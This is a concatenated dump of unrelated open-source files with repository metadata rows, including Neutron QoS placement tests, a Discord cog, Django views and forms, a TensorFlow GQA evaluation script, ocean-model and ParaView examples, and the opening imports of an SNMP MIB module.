consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -500,
'NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC': 1000},
self.MIN_BW_RP: {
'NET_BW_IGR_KILOBIT_PER_SEC': -1000,
'NET_BW_EGR_KILOBIT_PER_SEC': 2000}})
def test_change_placement_allocation_change_dir_min_pps_ingress_to_any(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kpps=1000, desired_min_kpps=1000)
for rule in qos2.rules:
rule.direction = 'any'
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.assertRaises(NotImplementedError,
self.qos_plugin._change_placement_allocation, qos1, qos2,
orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_min_bw_dataplane_enforcement(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_min_bw_dataplane_enforcement_with_pps(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=1000, original_min_kpps=500,
desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 500}})
def test_change_placement_allocation_decrease(self):
original_qos = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
original_qos, desired_qos, original_min_kbps=2000,
desired_min_kbps=1000, is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
original_qos, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_decrease_min_pps(self):
original_qos = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
original_qos, desired_qos, original_min_kpps=2000,
desired_min_kpps=1000, is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
original_qos, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_no_original_qos(self):
qos1 = None
qos2 = self._make_qos_policy()
rule2_obj = self._make_qos_minbw_rule(qos2.id, min_kbps=1000)
qos2.rules = [rule2_obj]
orig_port = {'id': 'u:u', 'device_id': 'i:d', 'binding:profile': {}}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_no_original_allocation(self):
qos1 = self._make_qos_policy()
rule1_obj = self._make_qos_minbw_rule(qos1.id, min_kbps=500)
qos1.rules = [rule1_obj]
qos2 = self._make_qos_policy()
rule2_obj = self._make_qos_minbw_rule(qos2.id, min_kbps=1000)
qos2.rules = [rule2_obj]
orig_port = {'id': 'u:u', 'device_id': 'i:d', 'binding:profile': {}}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_new_policy_empty(self):
qos1 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(qos1,
original_min_kbps=1000, original_min_kpps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, None, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000},
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -2000}})
def test_change_placement_allocation_no_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
bw_limit_rule1 = rule_object.QosDscpMarkingRule(dscp_mark=16)
bw_limit_rule2 = rule_object.QosDscpMarkingRule(dscp_mark=18)
qos1.rules = [bw_limit_rule1]
qos2.rules = [bw_limit_rule2]
orig_port = {
'binding:profile': {'allocation': {
self.MIN_BW_REQUEST_GROUP_UUID: self.MIN_BW_RP}},
'device_id': 'uu:id',
'id': '9416c220-160a-11ec-ba3d-474633eb825c',
}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, None, orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_old_rule_not_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
bw_limit_rule = rule_object.QosDscpMarkingRule(dscp_mark=16)
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=2000)
qos1.rules = [bw_limit_rule]
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_new_rule_not_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
bw_limit_rule = rule_object.QosDscpMarkingRule(dscp_mark=16)
qos2.rules = [bw_limit_rule]
orig_port, port = self._prepare_port_for_placement_allocation(qos1,
original_min_kbps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000}})
def test_change_placement_allocation_equal_minkbps_and_minkpps(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=1000,
original_min_kpps=1000, desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_update_conflict(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
mock_update_qos_alloc.side_effect = ks_exc.Conflict(
response={'errors': [{'code': 'placement.concurrent_update'}]}
)
self.assertRaises(
neutron_qos_exc.QosPlacementAllocationUpdateConflict,
self.qos_plugin._change_placement_allocation,
qos1, qos2, orig_port, port)
def test_change_placement_allocation_update_generation_conflict(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
mock_update_qos_alloc.side_effect = (
pl_exc.PlacementAllocationGenerationConflict(
consumer=self.MIN_BW_RP))
self.assertRaises(
pl_exc.PlacementAllocationGenerationConflict,
self.qos_plugin._change_placement_allocation,
qos1, qos2, orig_port, port)
def test_change_placement_allocation_qos_network_policy(self):
qos_network = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
None, desired_qos, qos_network_policy=qos_network,
original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos_network, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
| 45.742969 | 79 | 0.617556 | 126,419 | 0.983867 | 0 | 0 | 13,018 | 0.101314 | 0 | 0 | 18,391 | 0.14313 |
b9ef252652f99c5c9feffaab6f06bdbb7fe7dd89 | 953 | py | Python | covfefe/covfefe.py | fixator10/Trusty-cogs | 3d47a63f562cb64eb44da6bb53cfe9f8324026e7 | [
"MIT"
] | 148 | 2017-04-23T19:57:50.000Z | 2022-03-12T06:59:58.000Z | covfefe/covfefe.py | mina9999/Trusty-cogs | a47de7c233f3c1802effd29f4a86f8a9b0e2b34a | [
"MIT"
] | 155 | 2018-01-01T13:27:45.000Z | 2022-03-12T05:17:51.000Z | covfefe/covfefe.py | mina9999/Trusty-cogs | a47de7c233f3c1802effd29f4a86f8a9b0e2b34a | [
"MIT"
] | 221 | 2017-04-02T00:26:08.000Z | 2022-03-26T15:06:54.000Z | import re
import discord
from redbot.core import commands
class Covfefe(commands.Cog):
"""
Convert almost any word into covfefe
"""
def __init__(self, bot):
self.bot = bot
async def covfefe(self, x, k="aeiouy])"):
"""
https://codegolf.stackexchange.com/a/123697
"""
try:
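            # k defaults to "aeiouy])", so the f-string below expands to the
            # valid pattern "(.*?[aeiouy])([^aeiouy]).*?([aeiouy])" -- the
            # closing brackets/parens come from k itself (code-golf trick).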
b, c, v = re.findall(f"(.*?[{k}([^{k}.*?([{k}", x)[0]
return b + c + (("bcdfgkpstvz" + c)["pgtvkgbzdfs".find(c)] + v) * 2
except IndexError:
return None
async def red_delete_data_for_user(self, **kwargs):
"""
Nothing to delete
"""
return
@commands.command()
async def covefy(self, ctx, msg):
"""Convert almost any word into covfefe"""
newword = await self.covfefe(msg)
if newword is not None:
await ctx.send(newword)
else:
await ctx.send("I cannot covfefeify that word")
| 24.435897 | 79 | 0.541448 | 891 | 0.934942 | 0 | 0 | 292 | 0.306401 | 711 | 0.746065 | 294 | 0.308499 |
b9ef44f166a7664004d3feffe782db268867e247 | 1,487 | py | Python | src/api/bkuser_core/audit/views.py | trueware/bk-user | 8c633e0a3821beb839ed120c4514c5733e675862 | [
"MIT"
] | null | null | null | src/api/bkuser_core/audit/views.py | trueware/bk-user | 8c633e0a3821beb839ed120c4514c5733e675862 | [
"MIT"
] | null | null | null | src/api/bkuser_core/audit/views.py | trueware/bk-user | 8c633e0a3821beb839ed120c4514c5733e675862 | [
"MIT"
] | 1 | 2021-12-31T06:48:41.000Z | 2021-12-31T06:48:41.000Z | # -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from bkuser_core.common.viewset import AdvancedListAPIView, AdvancedModelViewSet
from . import serializers as local_serializers
from .models import GeneralLog, LogIn, ResetPassword
class GeneralLogViewSet(AdvancedModelViewSet, AdvancedListAPIView):
queryset = GeneralLog.objects.all()
serializer_class = local_serializers.GeneralLogSerializer
lookup_field = "id"
class LoginLogViewSet(AdvancedModelViewSet, AdvancedListAPIView):
queryset = LogIn.objects.all()
serializer_class = local_serializers.LoginLogSerializer
lookup_field = "id"
class ResetPasswordLogViewSet(AdvancedModelViewSet, AdvancedListAPIView):
queryset = ResetPassword.objects.all()
serializer_class = local_serializers.ResetPasswordLogSerializer
lookup_field = "id"
| 45.060606 | 115 | 0.799597 | 585 | 0.389222 | 0 | 0 | 0 | 0 | 0 | 0 | 737 | 0.490353 |
b9ef4b5c2209cb05949e60eccf8cd9158602e350 | 4,784 | py | Python | exp_gqa/test.py | ronghanghu/gqa_single_hop_baseline | 332d342da60dfefd40f2364d60215ed2f191aa2d | [
"BSD-2-Clause"
] | 19 | 2019-08-19T18:09:26.000Z | 2021-08-29T15:58:30.000Z | exp_gqa/test.py | ronghanghu/gqa_single_hop_baseline | 332d342da60dfefd40f2364d60215ed2f191aa2d | [
"BSD-2-Clause"
] | 1 | 2019-11-24T14:36:29.000Z | 2019-12-11T08:33:12.000Z | exp_gqa/test.py | ronghanghu/gqa_single_hop_baseline | 332d342da60dfefd40f2364d60215ed2f191aa2d | [
"BSD-2-Clause"
] | 1 | 2019-10-30T05:55:52.000Z | 2019-10-30T05:55:52.000Z | import os
import numpy as np
import tensorflow as tf
from models_gqa.model import Model
from models_gqa.config import build_cfg_from_argparse
from util.gqa_train.data_reader import DataReader
import json
# Load config
cfg = build_cfg_from_argparse()
# Start session
os.environ["CUDA_VISIBLE_DEVICES"] = str(cfg.GPU_ID)
sess = tf.Session(config=tf.ConfigProto(
gpu_options=tf.GPUOptions(allow_growth=cfg.GPU_MEM_GROWTH)))
# Data files
imdb_file = cfg.IMDB_FILE % cfg.TEST.SPLIT_VQA
scene_graph_file = cfg.SCENE_GRAPH_FILE % \
cfg.TEST.SPLIT_VQA.replace('_balanced', '').replace('_all', '')
data_reader = DataReader(
imdb_file, shuffle=False, one_pass=True, batch_size=cfg.TEST.BATCH_SIZE,
T_encoder=cfg.T_ENCODER,
vocab_question_file=cfg.VOCAB_QUESTION_FILE,
vocab_answer_file=cfg.VOCAB_ANSWER_FILE,
feature_type=cfg.FEAT_TYPE,
spatial_feature_dir=cfg.SPATIAL_FEATURE_DIR,
objects_feature_dir=cfg.OBJECTS_FEATURE_DIR,
objects_max_num=cfg.W_FEAT,
scene_graph_file=scene_graph_file,
vocab_name_file=cfg.VOCAB_NAME_FILE,
vocab_attr_file=cfg.VOCAB_ATTR_FILE,
spatial_pos_enc_dim=cfg.SPATIAL_POS_ENC_DIM,
bbox_tile_num=cfg.BBOX_TILE_NUM)
num_vocab = data_reader.batch_loader.vocab_dict.num_vocab
num_choices = data_reader.batch_loader.answer_dict.num_vocab
# Inputs and model
input_seq_batch = tf.placeholder(tf.int32, [None, None])
seq_length_batch = tf.placeholder(tf.int32, [None])
image_feat_batch = tf.placeholder(
tf.float32, [None, cfg.H_FEAT, cfg.W_FEAT, cfg.D_FEAT])
image_valid_batch = tf.placeholder(
tf.float32, [None, cfg.H_FEAT, cfg.W_FEAT])
model = Model(
input_seq_batch, seq_length_batch, image_feat_batch, image_valid_batch,
num_vocab=num_vocab, num_choices=num_choices, is_training=False)
# Load snapshot
if cfg.TEST.USE_EMA:
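    # Map each model variable to its exponential-moving-average (shadow) name
    # so the saver restores the EMA weights instead of the raw training values.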
ema = tf.train.ExponentialMovingAverage(decay=0.9) # decay doesn't matter
var_names = {
(ema.average_name(v) if v in model.params else v.op.name): v
for v in tf.global_variables()}
else:
var_names = {v.op.name: v for v in tf.global_variables()}
snapshot_file = cfg.TEST.SNAPSHOT_FILE % (cfg.EXP_NAME, cfg.TEST.ITER)
print('loading model snapshot from %s' % snapshot_file)
snapshot_saver = tf.train.Saver(var_names)
snapshot_saver.restore(sess, snapshot_file)
print('Done')
# Write results
result_dir = cfg.TEST.RESULT_DIR % (cfg.EXP_NAME, cfg.TEST.ITER)
os.makedirs(result_dir, exist_ok=True)
# Run test
answer_correct, num_questions = 0, 0
if cfg.TEST.OUTPUT_VQA_EVAL_PRED:
output_predictions = []
answer_word_list = data_reader.batch_loader.answer_dict.word_list
pred_file = os.path.join(
result_dir, 'gqa_eval_preds_%s_%s_%08d.json' % (
cfg.TEST.SPLIT_VQA, cfg.EXP_NAME, cfg.TEST.ITER))
for n_batch, batch in enumerate(data_reader.batches()):
if 'answer_label_batch' not in batch:
batch['answer_label_batch'] = -np.ones(
len(batch['qid_list']), np.int32)
if num_questions == 0:
print('imdb has no answer labels. Using dummy labels.\n\n'
'**The final accuracy will be zero (no labels provided)**\n')
vqa_scores_value = sess.run(model.vqa_scores, feed_dict={
input_seq_batch: batch['input_seq_batch'],
seq_length_batch: batch['seq_length_batch'],
image_feat_batch: batch['image_feat_batch'],
image_valid_batch: batch['image_valid_batch']})
# compute accuracy
vqa_labels = batch['answer_label_batch']
vqa_predictions = np.argmax(vqa_scores_value, axis=1)
answer_correct += np.sum(vqa_predictions == vqa_labels)
num_questions += len(vqa_labels)
accuracy = answer_correct / num_questions
if n_batch % 20 == 0:
print('exp: %s, iter = %d, accumulated accuracy on %s = %f (%d / %d)' %
(cfg.EXP_NAME, cfg.TEST.ITER, cfg.TEST.SPLIT_VQA,
accuracy, answer_correct, num_questions))
if cfg.TEST.OUTPUT_VQA_EVAL_PRED:
output_predictions.extend([
{"questionId": qId, "prediction": answer_word_list[p]}
for qId, p in zip(batch['qid_list'], vqa_predictions)])
with open(os.path.join(
result_dir, 'vqa_results_%s.txt' % cfg.TEST.SPLIT_VQA), 'w') as f:
print('\nexp: %s, iter = %d, final accuracy on %s = %f (%d / %d)' %
(cfg.EXP_NAME, cfg.TEST.ITER, cfg.TEST.SPLIT_VQA,
accuracy, answer_correct, num_questions))
print('exp: %s, iter = %d, final accuracy on %s = %f (%d / %d)' %
(cfg.EXP_NAME, cfg.TEST.ITER, cfg.TEST.SPLIT_VQA,
accuracy, answer_correct, num_questions), file=f)
if cfg.TEST.OUTPUT_VQA_EVAL_PRED:
with open(pred_file, 'w') as f:
json.dump(output_predictions, f, indent=2)
print('prediction file written to %s' % pred_file)
| 40.201681 | 79 | 0.713002 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 775 | 0.161998 |
b9efb93e53325ce5948d495ecf3a99ce26893591 | 2,071 | py | Python | extract_gear/armor_visitor.py | kamerons/dde-extract-gear | 44464ae470bd5de6279d32e3587b469ce006ea42 | [
"Apache-2.0"
] | null | null | null | extract_gear/armor_visitor.py | kamerons/dde-extract-gear | 44464ae470bd5de6279d32e3587b469ce006ea42 | [
"Apache-2.0"
] | null | null | null | extract_gear/armor_visitor.py | kamerons/dde-extract-gear | 44464ae470bd5de6279d32e3587b469ce006ea42 | [
"Apache-2.0"
] | null | null | null | class ArmorVisitor:
def __init__(self, num_pages, first_page_col_start, first_page_row_start,
last_page_row_start, last_page_col_end, last_page_row_end, num_col_page=5, num_row_page=3):
self.num_pages = num_pages
self.first_page_col_start = first_page_col_start
self.first_page_row_start = first_page_row_start
self.last_page_row_start = last_page_row_start
self.last_page_col_end = last_page_col_end
self.last_page_row_end = last_page_row_end
self.num_col_page = num_col_page
self.num_row_page = num_row_page
def iterate(self, callback):
for page_num in range(1, self.num_pages + 1):
page = self.create_page(page_num)
i = 0
for coord in page:
callback(coord, page_num, i)
i += 1
def create_page(self, page_num):
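    # The first and last pages may be only partially filled, so their row/col
    # bounds come from the constructor arguments; middle pages always span the
    # full num_col_page x num_row_page grid.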
if page_num == 1:
last_col = self.num_col_page if self.num_pages > 1 else self.last_page_col_end
last_row = self.num_row_page if self.num_pages > 1 else self.last_page_row_end
page = Page(self.first_page_col_start, self.first_page_row_start, last_col, last_row, self.num_col_page)
elif page_num == self.num_pages:
page = Page(1, self.last_page_row_start,
self.last_page_col_end, self.last_page_row_end, self.num_col_page)
else:
page = Page(1, 1, self.num_col_page, self.num_row_page, self.num_col_page)
return page
class Page:
def __init__(self, start_col, start_row, last_col, last_row, num_col_page=5):
self.start_col = start_col
self.start_row = start_row
self.last_col = last_col
self.last_row = last_row
self.num_col_page = num_col_page
def __iter__(self):
self.cur_row = self.start_row
self.cur_col = self.start_col
return self
def __next__(self):
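    # Row-major traversal: return the current (row, col), then advance one
    # column, wrapping to the next row after num_col_page columns.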
position = (self.cur_row, self.cur_col)
if self.cur_row > self.last_row or (self.cur_col > self.last_col and self.cur_row == self.last_row):
raise StopIteration
elif self.cur_col == self.num_col_page:
self.cur_col = 1
self.cur_row += 1
else:
self.cur_col += 1
return position
| 32.873016 | 110 | 0.718493 | 2,067 | 0.998069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
b9f15c3b93c89d0226f4f6b8fd7503987d856e88 | 542 | py | Python | gamla/url_utils_test.py | hyroai/gamla | bfa05807685bd51cba7c4c9cc47f1f5e73e6f7ee | [
"MIT"
] | 17 | 2020-03-19T08:40:39.000Z | 2022-03-06T14:43:35.000Z | gamla/url_utils_test.py | hyroai/gamla | bfa05807685bd51cba7c4c9cc47f1f5e73e6f7ee | [
"MIT"
] | 39 | 2020-04-13T16:52:43.000Z | 2022-03-24T08:30:49.000Z | gamla/url_utils_test.py | uriva/gamla | 65b450a7761cbc13bdbc7a4216003932f18cf433 | [
"MIT"
] | 2 | 2019-11-13T15:13:51.000Z | 2019-12-10T15:19:04.000Z | from gamla import url_utils
def test_add_to_query_string1():
assert (
url_utils.add_to_query_string(
{"a": 123},
"https://www.domain.com/path?param1=param1#anchor",
)
== "https://www.domain.com/path?param1=param1&a=123#anchor"
)
def test_add_to_query_string2():
assert (
url_utils.add_to_query_string(
{"param1": 123},
"https://www.domain.com/path?param1=param1#anchor",
)
== "https://www.domain.com/path?param1=123#anchor"
)
| 24.636364 | 67 | 0.586716 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 214 | 0.394834 |
b9f25a250dce61318cad2d5bfa0bebb70f70d2dc | 1,071 | py | Python | examples/temp_feie_shetland.py | nilsmkMET/roppy | c68d698fa4970174af2c7f7137bd4a3e5983b644 | [
"MIT"
] | null | null | null | examples/temp_feie_shetland.py | nilsmkMET/roppy | c68d698fa4970174af2c7f7137bd4a3e5983b644 | [
"MIT"
] | null | null | null | examples/temp_feie_shetland.py | nilsmkMET/roppy | c68d698fa4970174af2c7f7137bd4a3e5983b644 | [
"MIT"
] | null | null | null | import numpy as np
from netCDF4 import Dataset
# Import development version of roppy
import sys
sys.path = ['..'] + sys.path
import roppy
# --- EDIT -----------------
# ROMS file
romsfile = 'data/ocean_avg_example.nc'
# Section definition
lon0, lat0 = -0.67, 60.75 # Shetland
lon1, lat1 = 4.72, 60.75 # Feie
# --- EDIT ------------------
# Make a grid object
f = Dataset(romsfile)
grd = roppy.SGrid(f)
# Get grid coordinates of end points
x0, y0 = grd.ll2xy(lon0, lat0)
x1, y1 = grd.ll2xy(lon1, lat1)
# Find nearest rho-points
i0, j0, i1, j1 = [int(round(v)) for v in (x0, y0, x1, y1)]
# Make a Section object
sec = roppy.linear_section(i0, i1, j0, j1, grd)
# Read in a 3D temperature field
temp = f.variables['temp'][0,:,:,:]
# Interpolate to the section
temp_sec = sec.sample3D(temp)
# Compute mean temperature along section
# using trapezoidal integration
print("mean temperature =", np.sum(sec.Area * temp_sec) / np.sum(sec.Area))
# TODO: Make a mean method in the Section class
# Usage: sec.mean(temp_sec)
# or even directly from 3D: sec.mean(temp)
| 22.787234 | 74 | 0.6676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 553 | 0.51634 |
b9f401385afbe018601c2bef20e53c9b587fb7df | 485 | py | Python | examples/test_scalar_field.py | gemini3d/pv-gemini | 99dff15b43a2c93cbcb63d2f8946d425d0555ef3 | ["Apache-2.0"] | null | null | null | examples/test_scalar_field.py | gemini3d/pv-gemini | 99dff15b43a2c93cbcb63d2f8946d425d0555ef3 | ["Apache-2.0"] | null | null | null | examples/test_scalar_field.py | gemini3d/pv-gemini | 99dff15b43a2c93cbcb63d2f8946d425d0555ef3 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python3
"""
example of 3D scalar field
If you get this error, ParaView doesn't know your data file format:
TypeError: TestFileReadability argument %Id: %V
"""
from pathlib import Path
import argparse
import paraview.simple as pvs
p = argparse.ArgumentParser()
p.add_argument("fn", help="data file to load with paraview OpenDataFile()")
P = p.parse_args()
fn = Path(P.fn).expanduser()
if not fn.is_file():
raise FileNotFoundError(fn)
pvs.OpenDataFile(str(fn))
| 20.208333 | 75 | 0.740206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 225 | 0.463918 |
b9f4182f4b0683cbf4f51c72cef042f5acb55553 | 341 | py | Python | src/cms/forms/languages/language_form.py | S10MC2015/cms-django | b08f2be60a9db6c8079ee923de2cd8912f550b12 | ["Apache-2.0"] | null | null | null | src/cms/forms/languages/language_form.py | S10MC2015/cms-django | b08f2be60a9db6c8079ee923de2cd8912f550b12 | ["Apache-2.0"] | null | null | null | src/cms/forms/languages/language_form.py | S10MC2015/cms-django | b08f2be60a9db6c8079ee923de2cd8912f550b12 | ["Apache-2.0"] | null | null | null |
from django import forms
from ...models import Language
class LanguageForm(forms.ModelForm):
"""
Form for creating and modifying language objects
"""
class Meta:
model = Language
fields = [
"code",
"english_name",
"native_name",
"text_direction",
]
| 17.947368 | 52 | 0.548387 | 281 | 0.824047 | 0 | 0 | 0 | 0 | 0 | 0 | 113 | 0.331378 |
b9f437d2e63f9838da4ffa0491804e95e149a773 | 1,482 | py | Python | search/forms.py | gregneagle/sal | 74c583fb1c1b33d3201b308b147376b3dcaca33f | ["Apache-2.0"] | 2 | 2019-11-01T20:50:35.000Z | 2021-01-13T22:02:55.000Z | search/forms.py | gregneagle/sal | 74c583fb1c1b33d3201b308b147376b3dcaca33f | ["Apache-2.0"] | null | null | null | search/forms.py | gregneagle/sal | 74c583fb1c1b33d3201b308b147376b3dcaca33f | ["Apache-2.0"] | null | null | null |
from django import forms
from .models import *
from server.models import *
class ChoiceFieldNoValidation(forms.ChoiceField):
def validate(self, value):
pass
class SaveSearchForm(forms.ModelForm):
class Meta:
model = SavedSearch
fields = ('name',)
class SearchRowForm(forms.ModelForm):
skip_fields = [
'id',
'machine_group',
'report',
'activity',
'errors',
'warnings',
'install_log',
'puppet_errors',
'install_log_hash'
]
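    # Build the search_field choices dynamically from every Machine model field not listed in skip_fields.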
search_fields = []
for f in Machine._meta.fields:
if f.name not in skip_fields:
add = (f.name,f.name,)
search_fields.append(add)
search_field = ChoiceFieldNoValidation(choices=sorted(search_fields))
and_or = ChoiceFieldNoValidation(choices=AND_OR_CHOICES)
def __init__(self, *args, **kwargs):
self.search_group = kwargs.pop('search_group', None)
super(SearchRowForm, self).__init__(*args, **kwargs)
try:
search_group_count = self.search_group.searchrow_set.count()
except:
search_group_count = 0
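        # The first row added to a search group gets a fixed, hidden "AND" operator.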
if search_group_count == 0 and self.search_group:
self.fields['and_or'] = ChoiceFieldNoValidation(
initial='AND',
widget=forms.HiddenInput()
)
class Meta:
model = SearchRow
fields = ('search_models', 'search_field', 'and_or', 'operator','search_term',)
| 27.962264 | 87 | 0.609312 | 1,400 | 0.944669 | 0 | 0 | 0 | 0 | 0 | 0 | 194 | 0.130904 |
b9f59c6c5e552b8bde064c8fa9f25427a65b2006 | 158,531 | py | Python | pysnmp-with-texts/InternetThruway-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | ["Apache-2.0"] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/InternetThruway-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | ["Apache-2.0"] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/InternetThruway-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | ["Apache-2.0"] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z |
#
# PySNMP MIB module InternetThruway-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/InternetThruway-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:58:27 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
